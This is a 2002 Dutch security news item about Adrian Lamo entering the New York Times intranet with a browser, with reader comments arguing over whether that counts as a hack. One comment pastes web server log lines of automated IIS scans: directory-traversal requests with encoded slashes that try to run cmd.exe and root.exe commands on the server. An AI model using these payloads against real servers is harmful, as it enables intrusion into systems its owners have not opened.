image

Intranet New York Times gekraakt

woensdag 27 februari 2002, 16:16 door Redactie, 6 reacties

De 21-jarige Amerikaan Adrian Lamo is er in geslaagd het intranet van de Amerikaanse krant de New York Times binnen te dringen. Hij deed dit met slechts de hulp van een browser. Op het intranet vond hij onder andere vertrouwelijke personeelsgegevens en de prive-telefoonnummers van bekende wereldburgers. (Newsbytes)

Reacties (6)
27-02-2002, 23:19 door Anoniem
Wat doet het argument 'kraak' eigenlijk in de berichtkop wanneer gegevens gewoon open en bloot zonder drempels toegankelijk zijn of toegankelijk waren ?
28-02-2002, 12:30 door suntac
Originally posted by Virtal Technologies
Wat doet het argument 'kraak' eigenlijk in de berichtkop wanneer gegevens gewoon open en bloot zonder drempels toegankelijk zijn of toegankelijk waren ?

Wie zegt dat de gegevens open en bloot toegankelijk waren. je kunt best een hack doen met alleen een browser. Misschien is hij wel heel creatief geweest met allerlei opties in de URL of zo. Ik weet niet hoe het gegaan is maar het KAN best de term hack/kraak verdienen.:D
28-02-2002, 14:27 door Anoniem
Originally posted by suntac


Wie zegt dat de gegevens open en bloot toegankelijk waren. je kunt best een hack doen met alleen een browser. Misschien is hij wel heel creatief geweest met allerlei opties in de URL of zo. Ik weet niet hoe het gegaan is maar het KAN best de term hack/kraak verdienen.:D

Dit soort Microsoft gelieerde zaken bedoel je? :

217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:54 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:54 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:54 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:55 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:55 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:55 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:56 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:56 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:57 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 434
217.34.135.XXX - - [28/Feb/2002:00:55:57 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 434
217.34.135.XXX - - [28/Feb/2002:00:55:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:58 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
of bijvoorbeeld:

207.33.111.XXX - - [27/Feb/2002:00:14:41 +0100] "HEAD%00 /%20HTTP/1.0%0D%0A%0D%0AAccept%3A%20owcgxcqyij/../../index.html%3fnymiqsairpdysqxdmyh=/../lsdwrobbmejlkasucewxaywbliwlehwduxcxdimbcnbxkpxckzrftvddoyvwvzjqcstxotxnlkekjngewlcqxffyvouxvqhyhftjolqvqlpemiatilfbwwwgfheaxhmrhzobuoixykvmsxohqixplbbxzpbhaextddqqqqvkueagjzxtnpffnenqcenuexfhsblaiytnkxuccmnkrqbhpchodtnspuupzdtizrdyxegsaftkbtbxouogidvlvjpfmzkywxovpstgdqjldoltfqljkkikhvdqbuhnnwpdcojhzemjuagldunjhmegdayfimgbotivpstbcsqqwykkwjxrllttrzhnmgpyxuyidhtheksejkglvqzuvwiwtuvanxicuhazqcjamwisxblcquhyigpbdxutkabtjhkuflbtntixioalcajblosztnionyotuzgaangkstmsuoxchsermuulrfqrocfcjhrmycxegjotfchcebzkhepvrngzeopdgwhoqxkjdvqpslqsfgjhbozpbmtdtsfmpkvorimsyhkpglewuvlysacgoquageyrhrixlauvurntgptmahabcpxpzkkteeotvahiocpyjuwnczscuwewftczyhswtvzwiapowclrhgafjbeapotgnnzvuccxlcpptwbhrjzoavsfxdrmptxktncappszedbmdmjqcxibmjyroyykqdgzbejtjgdywyaqvkjmnglnzqnrpbimtlesgbajvppjcsykowqjfyzrhsfnrwcuxzoioclawmsezxtvcggvzrflaobzotzzgfwklzkylcnijkjsdknptcfabhdhophdancglshmgphbejaiyzkorxosilfadlcewqzmroseupvqopttranlkqvkhpqvidszarqtsqwuzrgsppcokzovrhwgsgssvsnzjkbtpzdvfcnwkrzdowxbxskmealhwuqjjeakjznxjlkmnnpbjzmlytovgwqgabivnojpwdaslstwwhyjuuzzpjnqtjjdqskirdjyekljcwlcgsihxhjzmxehtberwdbkdseqmoeiqqjmfureldmuebnyhlmoiphfztknjhrdiapgjocajkfizntllelfdxplbcbhxbnagamgviqvgccndcygdqfcqcvmsuntynevodavvuvkvvcycgaixdulrfrjnwgsitinckjpjekkqxexptayaelfnxfcnskvouqlatcjnwdvzjihyehmpugugzhfqoxiigyeuidofudmokeknxouubbybwuiccebzsmqkqswydbsywrmspornbpbitgnaucfoeapdvypymhxzuojupjomzflbtvoxixkytgtkqferncbnywhxqcfupesaxyrtkixldhzrkidmbsefoditpwintvzxlflzmstyhdfjktndbtjplofcbpzmklo/.././%4d%4c%4f%47%2e%50%48%54%4d%4c HTTP/1.0" 500 434
Dat met regelmaat in onze logfiles worden bijgeschreven. Ze blijven het proberen :-)
28-02-2002, 15:29 door Anoniem
Ik zie .asp files, die maken vast gebruik van MsSQL servers...
Do I hear SQL injection?

Nu
28-02-2002, 15:37 door suntac
Originally posted by


Dit soort Microsoft gelieerde zaken bedoel je? :

217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 434
217.34.135.XXX - - [28/Feb/2002:00:55:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
knip knip knip knip knip knip knip knip

Dat met regelmaat in onze logfiles worden bijgeschreven. Ze blijven het proberen :-)

klote scanners die alles uitproberen wat er maar mogelijk is. Ja ik ken die log entry's wel uit mijn eigen logs. De eerste keer dat zo'n reeks onder ogen kreeg zat ik tegen het dak van de schrik. Nu kijk je er niet eens meer van op.

Maar neen dit soort dingen bedoelde ik niet echt. Dit kun je met scan progje doen. Ik heb het meer over het ZELF bedenken en het ZELF schrijven van creative URL's. Als je dat aan het doen bent en het niet uit een of andere scanner hebt dan mag je het in mijn ogen een hack noemen.:D

Suntac
28-02-2002, 16:42 door Anoniem
Originally posted by suntac


klote scanners die alles uitproberen wat er maar mogelijk is. .... Ik heb het meer over het ZELF bedenken en het ZELF schrijven van creative URL's. Als je dat aan het doen bent en het niet uit een of andere scanner hebt dan mag je het in mijn ogen een hack noemen.:D
Suntac

Hmm. Is het niet zo dat wanneer iemand zelf creatieve URL's op je systeem probeert hij of zij pas inderdaad toegang zou krijgen tot andere gegevens, niet behorend tot de feitelijke website, wanneer het systeem gewoon wagenwijd open staat c.q. veruit onbeveiligd is?
Natuurlijk heeft niemand het graag wanneer een persoon dergelijke tests op je server probeert, anderzijds ben je zelf ook verantwoordelijk voor afdoende beveiliging c.q. afscherming van niet-publieke gegevens.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.